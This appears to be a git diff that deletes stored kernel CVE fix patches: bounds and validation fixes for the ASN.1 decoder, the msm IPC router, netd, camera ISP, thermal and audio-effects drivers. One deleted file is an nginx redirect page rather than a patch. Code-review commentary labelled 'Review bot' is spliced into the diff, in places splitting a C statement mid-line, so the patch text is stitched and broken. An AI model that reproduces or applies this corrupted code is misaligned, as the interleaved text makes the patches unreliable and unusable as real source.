-context, caused by the overwritten CPU index in the thread_info).
-
-Just panic directly.
-
-Signed-off-by: Jann Horn
-Signed-off-by: Linus Torvalds
----
- kernel/sched/core.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/kernel/sched/core.c b/kernel/sched/core.c
-index d1f7149..11546a6 100644
---- a/kernel/sched/core.c
-+++ b/kernel/sched/core.c
-@@ -3047,7 +3047,8 @@ static noinline void __schedule_bug(struct task_struct *prev)
- static inline void schedule_debug(struct task_struct *prev)
- {
- #ifdef CONFIG_SCHED_STACK_END_CHECK
-- BUG_ON(task_stack_end_corrupted(prev));
-+ if (task_stack_end_corrupted(prev))
-+ panic("corrupted stack end detected inside scheduler\n");
- #endif
-
- if (unlikely(in_atomic_preempt_off())) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2053/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2053/ANY/0001.patch
deleted file mode 100644
index 53718a7b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2053/ANY/0001.patch
+++ /dev/null
@@ -1,125 +0,0 @@ -From 0d62e9dd6da45bbf0f33a8617afc5fe774c8f45f Mon Sep 17 00:00:00 2001 -From: David Howells -Date: Wed, 5 Aug 2015 12:54:46 +0100 -Subject: ASN.1: Fix non-match detection failure on data overrun - -If the ASN.1 decoder is asked to parse a sequence of objects, non-optional -matches get skipped if there's no more data to be had rather than a -data-overrun error being reported. - -This is due to the code segment that decides whether to skip optional -matches (ie. matches that could get ignored because an element is marked -OPTIONAL in the grammar) due to a lack of data also skips non-optional -elements if the data pointer has reached the end of the buffer. - -This can be tested with the data decoder for the new RSA akcipher algorithm -that takes three non-optional integers. Currently, it skips the last -integer if there is insufficient data. - -Without the fix, #defining DEBUG in asn1_decoder.c will show something -like: - - next_op: pc=0/13 dp=0/270 C=0 J=0 - - match? 30 30 00 - - TAG: 30 266 CONS - next_op: pc=2/13 dp=4/270 C=1 J=0 - - match? 02 02 00 - - TAG: 02 257 - - LEAF: 257 - next_op: pc=5/13 dp=265/270 C=1 J=0 - - match? 02 02 00 - - TAG: 02 3 - - LEAF: 3 - next_op: pc=8/13 dp=270/270 C=1 J=0 - next_op: pc=11/13 dp=270/270 C=1 J=0 - - end cons t=4 dp=270 l=270/270 - -The next_op line for pc=8/13 should be followed by a match line. - -This is not exploitable for X.509 certificates by means of shortening the -message and fixing up the ASN.1 CONS tags because: - - (1) The relevant records being built up are cleared before use. - - (2) If the message is shortened sufficiently to remove the public key, the - ASN.1 parse of the RSA key will fail quickly due to a lack of data. 
- - (3) Extracted signature data is either turned into MPIs (which cope with a - 0 length) or is simpler integers specifying algoritms and suchlike - (which can validly be 0); and - - (4) The AKID and SKID extensions are optional and their removal is handled - without risking passing a NULL to asymmetric_key_generate_id(). - - (5) If the certificate is truncated sufficiently to remove the subject, - issuer or serialNumber then the ASN.1 decoder will fail with a 'Cons - stack underflow' return. - -This is not exploitable for PKCS#7 messages by means of removal of elements -from such a message from the tail end of a sequence: - - (1) Any shortened X.509 certs embedded in the PKCS#7 message are survivable - as detailed above. - - (2) The message digest content isn't used if it shows a NULL pointer, - similarly, the authattrs aren't used if that shows a NULL pointer. - - (3) A missing signature results in a NULL MPI - which the MPI routines deal - with. - - (4) If data is NULL, it is expected that the message has detached content and - that is handled appropriately. - - (5) If the serialNumber is excised, the unconditional action associated - with it will pick up the containing SEQUENCE instead, so no NULL - pointer will be seen here. - - If both the issuer and the serialNumber are excised, the ASN.1 decode - will fail with an 'Unexpected tag' return. - - In either case, there's no way to get to asymmetric_key_generate_id() - with a NULL pointer. - - (6) Other fields are decoded to simple integers. Shortening the message - to omit an algorithm ID field will cause checks on this to fail early - in the verification process. - - -This can also be tested by snipping objects off of the end of the ASN.1 stream -such that mandatory tags are removed - or even from the end of internal -SEQUENCEs. If any mandatory tag is missing, the error EBADMSG *should* be -produced. 
Without this patch ERANGE or ENOPKG might be produced or the parse -may apparently succeed, perhaps with ENOKEY or EKEYREJECTED being produced -later, depending on what gets snipped. - -Just snipping off the final BIT_STRING or OCTET_STRING from either sample -should be a start since both are mandatory and neither will cause an EBADMSG -without the patches - -Reported-by: Marcel Holtmann -Signed-off-by: David Howells -Tested-by: Marcel Holtmann -Reviewed-by: David Woodhouse ---- - lib/asn1_decoder.c | 5 ++--- - 1 file changed, 2 insertions(+), 3 deletions(-) - -diff --git a/lib/asn1_decoder.c b/lib/asn1_decoder.c -index 55980d7..3f74dd3 100644 ---- a/lib/asn1_decoder.c -+++ b/lib/asn1_decoder.c -@@ -210,9 +210,8 @@ next_op: - unsigned char tmp; - - /* Skip conditional matches if possible */ -- if ((op & ASN1_OP_MATCH__COND && -- flags & FLAG_MATCHED) || -- dp == datalen) { -+ if ((op & ASN1_OP_MATCH__COND && flags & FLAG_MATCHED) || -+ (op & ASN1_OP_MATCH__SKIP && dp == datalen)) { - flags &= ~FLAG_LAST_MATCHED; - pc += asn1_op_lengths[op]; - goto next_op; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2059/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2059/ANY/0001.patch deleted file mode 100644 index 0394e128..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2059/ANY/0001.patch +++ /dev/null 
@@ -1,41 +0,0 @@
-From 9e8bdd63f7011dff5523ea435433834b3702398d Mon Sep 17 00:00:00 2001
-From: Karthikeyan Ramasubramanian
-Date: Mon, 22 Feb 2016 16:30:40 -0700
-Subject: net: ipc_router: Bind only a client port as control port
-
-IPC Router binds any port as a control port and moves it from the client
-port list to control port list. Misbehaving clients can exploit this
-incorrect behavior.
-
-IPC Router to check if the port is a client port before binding it as a
-control port.
-
-CRs-Fixed: 974577
-Change-Id: I9f189b76967d5f85750218a7cb6537d187a69663
-Signed-off-by: Karthikeyan Ramasubramanian
----
- net/ipc_router/ipc_router_core.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/net/ipc_router/ipc_router_core.c b/net/ipc_router/ipc_router_core.c
-index 99486e9..3100ebd 100644
---- a/net/ipc_router/ipc_router_core.c
-+++ b/net/ipc_router/ipc_router_core.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -3532,7 +3532,7 @@ int msm_ipc_router_get_curr_pkt_size(struct msm_ipc_port *port_ptr)
-
- int msm_ipc_router_bind_control_port(struct msm_ipc_port *port_ptr)
- {
-- if (!port_ptr)
-+ if (unlikely(!port_ptr || port_ptr->type != CLIENT_PORT))
- return -EINVAL;
-
- down_write(&local_ports_lock_lhc2);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2060/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2060/ANY/0001.patch
deleted file mode 100644
index bc3e6afc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2060/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From e9925f5acb4401588e23ea8a27c3e318f71b5cf8 Mon Sep 17 00:00:00 2001
-From: Bryse Flowers
-Date: Thu, 11 Feb 2016 12:20:37 -0800
-Subject: netd: Validate incoming upstream interface before adding
-
-Add isIfaceName check to addUpstreamInterface.
-
-Change-Id: Iacb5cb1ca6476765e5350b1cf3d822f4fcda32b8
-CRs-Fixed: 959631
----
- server/TetherController.cpp | 7 ++++---
- 1 file changed, 4 insertions(+), 3 deletions(-)
-
-diff --git a/server/TetherController.cpp b/server/TetherController.cpp
-index f6287c8..c4d6b83 100644
---- a/server/TetherController.cpp
-+++ b/server/TetherController.cpp
-@@ -482,9 +482,10 @@ int TetherController::addUpstreamInterface(char *iface)
-
- ALOGD("addUpstreamInterface(%s)\n", iface);
-
-- if (!iface) {
-- ALOGE("addUpstreamInterface: received null interface");
-- return 0;
-+ if (!isIfaceName(iface)) {
-+ ALOGE("addUpstreamInterface: received invalid interface");
-+ errno = ENOENT;
-+ return -1;
- }
- for (it = mUpstreamInterfaces->begin(); it != mUpstreamInterfaces->end(); ++it) {
- ALOGD(".");
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2061/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2061/ANY/0001.patch
deleted file mode 100644
index f6306c84..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2061/ANY/0001.patch
+++ /dev/null
@@ -1,239 +0,0 @@ -From 79db14ca9f791a14be9376a0340ad3b9b9a4d603 Mon Sep 17 00:00:00 2001 -From: Jing Zhou -Date: Fri, 11 Mar 2016 17:30:50 -0800 -Subject: msm: camera: isp: Fix warning and errors based on static analysis - -This change fixes the warning/errors from static analysis - -CRs-fixed: 992942 -Change-Id: Iaf90ab4c1d17f903d03458d76cab1b4c0a5c8836 -Signed-off-by: Jing Zhou ---- - drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c | 3 +-- - .../media/platform/msm/camera_v2/isp/msm_isp_axi_util.c | 13 ++++++++----- - .../platform/msm/camera_v2/isp/msm_isp_stats_util.c | 5 ++--- - drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c | 16 +++++++++------- - drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 14 +++++++------- - 5 files changed, 27 insertions(+), 24 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c b/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c -index b196934..3331f0d 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c -@@ -85,6 +85,7 @@ struct msm_isp_bufq *msm_isp_get_bufq( - - /* bufq_handle cannot be 0 */ - if ((bufq_handle == 0) || -+ bufq_index >= BUF_MGR_NUM_BUF_Q || - (bufq_index > buf_mgr->num_buf_q)) - return NULL; - -@@ -1329,8 +1330,6 @@ static int msm_isp_buf_mgr_debug(struct msm_isp_buf_mgr *buf_mgr, - - for (i = 0; i < BUF_MGR_NUM_BUF_Q; i++) { - bufq = &buf_mgr->bufq[i]; -- if (!bufq) -- continue; - - spin_lock_irqsave(&bufq->bufq_lock, flags); - if (!bufq->bufq_handle) { -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c -index 61cc9b9..c98b8ad 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c -@@ -60,7 +60,7 @@ int msm_isp_axi_create_stream(struct vfe_device *vfe_dev, - struct msm_vfe_axi_shared_data *axi_data, - struct 
msm_vfe_axi_stream_request_cmd *stream_cfg_cmd) - { -- int i = stream_cfg_cmd->stream_src; -+ uint32_t i = stream_cfg_cmd->stream_src; - - if (i >= VFE_AXI_SRC_MAX) { - pr_err("%s:%d invalid stream_src %d\n", __func__, __LINE__, -@@ -1686,6 +1686,7 @@ static void msm_isp_handle_done_buf_frame_id_mismatch( - struct msm_isp_event_data error_event; - int ret = 0; - -+ memset(&error_event, 0, sizeof(error_event)); - error_event.frame_id = - vfe_dev->axi_data.src_info[VFE_PIX_0].frame_id; - error_event.u.error_info.err_type = -@@ -1709,7 +1710,7 @@ static int msm_isp_process_done_buf(struct vfe_device *vfe_dev, - struct msm_vfe_axi_stream *stream_info, struct msm_isp_buffer *buf, - struct timeval *time_stamp, uint32_t frame_id) - { -- int rc = 0, ret = 0; -+ int rc; - unsigned long flags; - struct msm_isp_event_data buf_event; - uint32_t stream_idx = HANDLE_TO_IDX(stream_info->stream_handle); -@@ -1771,7 +1772,7 @@ static int msm_isp_process_done_buf(struct vfe_device *vfe_dev, - if (rc == -EFAULT) { - msm_isp_halt_send_error(vfe_dev, - ISP_EVENT_BUF_FATAL_ERROR); -- return ret; -+ return rc; - } - if (!rc) { - ISP_DBG("%s:%d vfe_id %d Buffer dropped %d\n", -@@ -1827,7 +1828,7 @@ static int msm_isp_process_done_buf(struct vfe_device *vfe_dev, - if (rc == -EFAULT) { - msm_isp_halt_send_error(vfe_dev, - ISP_EVENT_BUF_FATAL_ERROR); -- return ret; -+ return rc; - } - } - -@@ -2406,7 +2407,8 @@ static int msm_isp_update_dual_HW_ms_info_at_stop( - static int msm_isp_update_dual_HW_axi(struct vfe_device *vfe_dev, - struct msm_vfe_axi_stream *stream_info) - { -- int rc = 0, vfe_id; -+ int rc = 0; -+ int vfe_id; - uint32_t stream_idx = HANDLE_TO_IDX(stream_info->stream_handle); - struct dual_vfe_resource *dual_vfe_res = NULL; - -@@ -2871,6 +2873,7 @@ static int msm_isp_return_empty_buffer(struct vfe_device *vfe_dev, - return rc; - } - -+ memset(&error_event, 0, sizeof(error_event)); - error_event.frame_id = frame_id; - error_event.u.error_info.err_type = 
ISP_ERROR_RETURN_EMPTY_BUFFER; - error_event.u.error_info.session_id = stream_info->session_id; -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c -index fe97f13..7eaffad 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c -@@ -117,7 +117,7 @@ static int msm_isp_stats_cfg_ping_pong_address(struct vfe_device *vfe_dev, - = buf; - } - } -- } else if (!vfe_dev->is_split) { -+ } else { - if (buf) - vfe_dev->hw_info->vfe_ops.stats_ops. - update_ping_pong_addr( -@@ -285,8 +285,7 @@ static int32_t msm_isp_stats_configure(struct vfe_device *vfe_dev, - if (rc < 0) { - pr_err("%s:%d failed: stats buf divert rc %d\n", - __func__, __LINE__, rc); -- if (0 == result) -- result = rc; -+ result = rc; - } - } - if (is_composite && comp_stats_type_mask) { -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -index 4535d20..8a6c395e 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -@@ -944,6 +944,7 @@ static long msm_isp_ioctl_unlocked(struct v4l2_subdev *sd, - unsigned int cmd, void *arg) - { - long rc = 0; -+ long rc2 = 0; - struct vfe_device *vfe_dev = v4l2_get_subdevdata(sd); - - if (!vfe_dev || !vfe_dev->vfe_base) { -@@ -1023,7 +1024,9 @@ static long msm_isp_ioctl_unlocked(struct v4l2_subdev *sd, - if (atomic_read(&vfe_dev->error_info.overflow_state) - != HALT_ENFORCED) { - rc = msm_isp_stats_reset(vfe_dev); -- rc |= msm_isp_axi_reset(vfe_dev, arg); -+ rc2 = msm_isp_axi_reset(vfe_dev, arg); -+ if (!rc && rc2) -+ rc = rc2; - } else { - pr_err_ratelimited("%s: no HW reset, halt enforced.\n", - __func__); -@@ -1035,7 +1038,9 @@ static long msm_isp_ioctl_unlocked(struct v4l2_subdev *sd, - if (atomic_read(&vfe_dev->error_info.overflow_state) - != 
HALT_ENFORCED) { - rc = msm_isp_stats_restart(vfe_dev); -- rc |= msm_isp_axi_restart(vfe_dev, arg); -+ rc2 = msm_isp_axi_restart(vfe_dev, arg); -+ if (!rc && rc2) -+ rc = rc2; - } else { - pr_err_ratelimited("%s: no AXI restart, halt enforced.\n", - __func__); -@@ -1822,8 +1827,6 @@ void msm_isp_update_error_frame_count(struct vfe_device *vfe_dev) - { - struct msm_vfe_error_info *error_info = &vfe_dev->error_info; - error_info->info_dump_frame_count++; -- if (error_info->info_dump_frame_count == 0) -- error_info->info_dump_frame_count++; - } - - -@@ -1922,6 +1925,7 @@ static void msm_isp_process_overflow_irq( - - if (atomic_read(&vfe_dev->error_info.overflow_state) - != HALT_ENFORCED) { -+ memset(&error_event, 0, sizeof(error_event)); - error_event.frame_id = - vfe_dev->axi_data.src_info[VFE_PIX_0].frame_id; - error_event.u.error_info.err_type = -@@ -1939,10 +1943,8 @@ void msm_isp_reset_burst_count_and_frame_drop( - stream_info->stream_type != BURST_STREAM) { - return; - } -- if (stream_info->stream_type == BURST_STREAM && -- stream_info->num_burst_capture != 0) { -+ if (stream_info->num_burst_capture != 0) - msm_isp_reset_framedrop(vfe_dev, stream_info); -- } - } - - static void msm_isp_enqueue_tasklet_cmd(struct vfe_device *vfe_dev, -diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c -index dc6af17..640379d 100644 ---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c -+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c -@@ -467,23 +467,23 @@ static void msm_ispif_sel_csid_core(struct ispif_device *ispif, - switch (intftype) { - case PIX0: - data &= ~(BIT(1) | BIT(0)); -- data |= csid; -+ data |= (uint32_t) csid; - break; - case RDI0: - data &= ~(BIT(5) | BIT(4)); -- data |= (csid << 4); -+ data |= ((uint32_t) csid) << 4; - break; - case PIX1: - data &= ~(BIT(9) | BIT(8)); -- data |= (csid << 8); -+ data |= ((uint32_t) csid) << 8; - break; - case RDI1: - data &= ~(BIT(13) | 
BIT(12)); -- data |= (csid << 12); -+ data |= ((uint32_t) csid) << 12; - break; - case RDI2: - data &= ~(BIT(21) | BIT(20)); -- data |= (csid << 20); -+ data |= ((uint32_t) csid) << 20; - break; - } - -@@ -559,9 +559,9 @@ static void msm_ispif_enable_intf_cids(struct ispif_device *ispif, - - data = msm_camera_io_r(ispif->base + intf_addr); - if (enable) -- data |= cid_mask; -+ data |= (uint32_t) cid_mask; - else -- data &= ~cid_mask; -+ data &= ~((uint32_t) cid_mask); - msm_camera_io_w_mb(data, ispif->base + intf_addr); - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2062/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2062/ANY/0001.patch deleted file mode 100644 index 2b9584e6..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2062/ANY/0001.patch +++ /dev/null @@ -1,7 +0,0 @@ - -301 Moved Permanently - -
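Review bot: In msm_ispif_sel_csid_core the added `(uint32_t)` casts change the type of `csid` but not its range, so a value wider than the two bits each case clears (for example `BIT(5) | BIT(4)` for RDI0) would still be OR-ed into the neighbouring fields of the register word. Whether the caller already bounds `csid` is not visible here, since the function starts above the hunk. If it does not, mask at the point of use, e.g. `data |= ((uint32_t) csid & 0x3) << 4;`, and do the same in the PIX0, PIX1, RDI1 and RDI2 cases.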

301 Moved Permanently

-
nginx/1.12.1
-
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2063/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2063/ANY/0001.patch
deleted file mode 100644
index 24f90187..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2063/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From ab3f46119ca10de87a11fe966b0723c48f27acd4 Mon Sep 17 00:00:00 2001
-From: Manaf Meethalavalappu Pallikunhi
-Date: Wed, 30 Mar 2016 17:12:16 +0530
-Subject: msm: limits: Check user buffer size before copying to local buffer
-
-User input data is passed in from userspace through debugfs interface
-of supply lm core to validate supply lm core functionality. Ensure
-user buffer size is not greater than expected stack buffer size
-to avoid out of bounds array accesses.
-
-Change-Id: I5a93774855241b50895c5e2b3ff939e4c33a0185
-Signed-off-by: Manaf Meethalavalappu Pallikunhi
----
- drivers/thermal/supply_lm_core.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/thermal/supply_lm_core.c b/drivers/thermal/supply_lm_core.c
-index fc8e807..a4d137f 100644
---- a/drivers/thermal/supply_lm_core.c
-+++ b/drivers/thermal/supply_lm_core.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -303,6 +303,11 @@ static ssize_t supply_lm_input_write(struct file *fp,
- enum corner_state gpu;
- enum corner_state modem;
-
-+ if (count > (MODE_MAX - 1)) {
-+ pr_err("Invalid user input\n");
-+ return -EINVAL;
-+ }
-+
- if (copy_from_user(&buf, user_buffer, count))
- return -EFAULT;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2064/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2064/ANY/0001.patch
deleted file mode 100644
index 06b77eb4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2064/ANY/0001.patch
+++ /dev/null
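Review bot: The bound added to supply_lm_input_write, `count > (MODE_MAX - 1)`, is tied to a constant rather than to the buffer that `copy_from_user(&buf, user_buffer, count)` fills. The declaration of `buf` lies outside this hunk, so the check is only correct while `buf` keeps exactly MODE_MAX elements. Assuming `buf` is an array, `if (count > sizeof(buf) - 1)` keeps the limit and the destination in step. The hunk also does not show `buf` being NUL-terminated after the copy; if the code below parses it as a string, `buf[count] = '\0';` should follow the copy unless the buffer is zero-initialised where it is declared.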
@@ -1,1511 +0,0 @@ -From 775fca8289eff931f91ff6e8c36cf2034ba59e88 Mon Sep 17 00:00:00 2001 -From: Weiyin Jiang -Date: Wed, 16 Mar 2016 12:51:03 +0800 -Subject: ASoC: msm: audio-effects: fix stack overread and heap overwrite - -Fix overwrite of updt_params allocated in heap, and stack overread -where param pointer is passed from user space. - -CRs-Fixed: 989628 -Change-Id: Ida8bdb7da2fcb97023dce3b6eafe4b899a51cb66 -Signed-off-by: Weiyin Jiang ---- - drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 3 +- - include/sound/msm-audio-effects-q6-v2.h | 4 +- - sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c | 835 +++++++++++++++++------- - sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c | 2 +- - 4 files changed, 588 insertions(+), 256 deletions(-) - -diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c -index c100c47..3ba20ca 100644 ---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c -+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2014-2015, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. - * - * This software is licensed under the terms of the GNU General Public - * License version 2, as published by the Free Software Foundation, and -@@ -20,7 +20,6 @@ - #include - - #define MAX_CHANNELS_SUPPORTED 8 --#define MAX_PP_PARAMS_SZ 128 - #define WAIT_TIMEDOUT_DURATION_SECS 1 - - struct q6audio_effects { -diff --git a/include/sound/msm-audio-effects-q6-v2.h b/include/sound/msm-audio-effects-q6-v2.h -index cbdea32..6bc2338 100644 ---- a/include/sound/msm-audio-effects-q6-v2.h -+++ b/include/sound/msm-audio-effects-q6-v2.h -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -16,6 +16,8 @@ - - #include - -+#define MAX_PP_PARAMS_SZ 128 -+ - bool msm_audio_effects_is_effmodule_supp_in_top(int effect_module, - int topology); - -diff --git a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c -index e26c453..1c08842 100644 ---- a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -20,6 +20,24 @@ - - #define MAX_ENABLE_CMD_SIZE 32 - -+#define GET_NEXT(ptr, upper_limit, rc) \ -+({ \ -+ if (((ptr) + 1) > (upper_limit)) { \ -+ pr_err("%s: param list out of boundary\n", __func__); \ -+ (rc) = -EINVAL; \ -+ } \ -+ ((rc) == 0) ? 
*(ptr)++ : -EINVAL; \ -+}) -+ -+#define CHECK_PARAM_LEN(len, max_len, tag, rc) \ -+do { \ -+ if ((len) > (max_len)) { \ -+ pr_err("%s: params length overflows\n", (tag)); \ -+ (rc) = -EINVAL; \ -+ } \ -+} while (0) -+ -+ - bool msm_audio_effects_is_effmodule_supp_in_top(int effect_module, - int topology) - { -@@ -109,15 +127,16 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac, - struct virtualizer_params *virtualizer, - long *values) - { -- int devices = *values++; -- int num_commands = *values++; -- char *params; -+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1; -+ char *params = NULL; -+ int rc = 0; -+ int devices = GET_NEXT(values, param_max_offset, rc); -+ int num_commands = GET_NEXT(values, param_max_offset, rc); - int *updt_params, i, prev_enable_flag; - uint32_t params_length = (MAX_INBAND_PARAM_SZ); -- int rc = 0; - - pr_debug("%s\n", __func__); -- if (!ac) { -+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) { - pr_err("%s: cannot set audio effects\n", __func__); - return -EINVAL; - } -@@ -130,10 +149,14 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac, - updt_params = (int *)params; - params_length = 0; - for (i = 0; i < num_commands; i++) { -- uint32_t command_id = *values++; -- uint32_t command_config_state = *values++; -- uint32_t index_offset = *values++; -- uint32_t length = *values++; -+ uint32_t command_id = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t command_config_state = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t index_offset = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t length = -+ GET_NEXT(values, param_max_offset, rc); - switch (command_id) { - case VIRTUALIZER_ENABLE: - if (length != 1 || index_offset != 0) { -@@ -142,17 +165,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac, - goto invalid_config; - } - prev_enable_flag = virtualizer->enable_flag; -- virtualizer->enable_flag = *values++; -+ virtualizer->enable_flag = -+ 
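Review bot: GET_NEXT reports failure twice, through `rc` and by yielding -EINVAL in the value position, so an input word that happens to equal -EINVAL cannot be told apart from a bounds failure by any caller that inspects the value. Callers should test `rc` after the read rather than the returned value. The macro also assigns to both `ptr` and `rc` and evaluates `ptr` more than once, which is easy to miss at the call sites. It deserves a comment above it such as `/* Reads *ptr and advances it; on overrun sets rc to -EINVAL, does not advance ptr and yields -EINVAL. */`.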
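Review bot: In msm_audio_effects_virtualizer_handler the guard `(devices == -EINVAL) || (num_commands == -EINVAL)` tests the sentinel value instead of the error code, so it would read more directly as `if (!ac || rc != 0) {`. Separately, `param_max_offset = values + MAX_PP_PARAMS_SZ - 1` together with GET_NEXT's `((ptr) + 1) > (upper_limit)` test stops one element early: the slot at index MAX_PP_PARAMS_SZ - 1 can never be read. That errs on the safe side, but the bound also assumes the caller's array really holds MAX_PP_PARAMS_SZ longs, which is not visible in this hunk. A comment on the declaration stating that assumption would help. The reverb, bass_boost, pbe and popless_eq handlers repeat the same two lines.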
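Review bot: The command loop keeps iterating after a read has failed, because the four header reads through GET_NEXT only set `rc` and the `for (i = 0; i < num_commands; i++)` condition never looks at it. `num_commands` comes from the same caller-supplied array, so a large value makes every remaining iteration log "param list out of boundary" four times before the function returns. Adding `if (rc != 0) goto invalid_config;` after the `length` read ends the loop at the first failure. The same loop head appears in the reverb, bass_boost, pbe and popless_eq handlers.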
GET_NEXT(values, param_max_offset, rc); - pr_debug("%s:VIRT ENABLE prev:%d, new:%d\n", __func__, - prev_enable_flag, virtualizer->enable_flag); - if (prev_enable_flag != virtualizer->enable_flag) { -- *updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER; -- *updt_params++ = -- AUDPROC_PARAM_ID_VIRTUALIZER_ENABLE; -- *updt_params++ = VIRTUALIZER_ENABLE_PARAM_SZ; -- *updt_params++ = virtualizer->enable_flag; - params_length += COMMAND_PAYLOAD_SZ + - VIRTUALIZER_ENABLE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "VIRT ENABLE", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_VIRTUALIZER; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_VIRTUALIZER_ENABLE; -+ *updt_params++ = -+ VIRTUALIZER_ENABLE_PARAM_SZ; -+ *updt_params++ = -+ virtualizer->enable_flag; - } - break; - case VIRTUALIZER_STRENGTH: -@@ -161,17 +193,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- virtualizer->strength = *values++; -+ virtualizer->strength = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: VIRT STRENGTH val: %d\n", - __func__, virtualizer->strength); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER; -+ params_length += COMMAND_PAYLOAD_SZ + -+ VIRTUALIZER_STRENGTH_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "VIRT STRENGTH", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_VIRTUALIZER; - *updt_params++ = 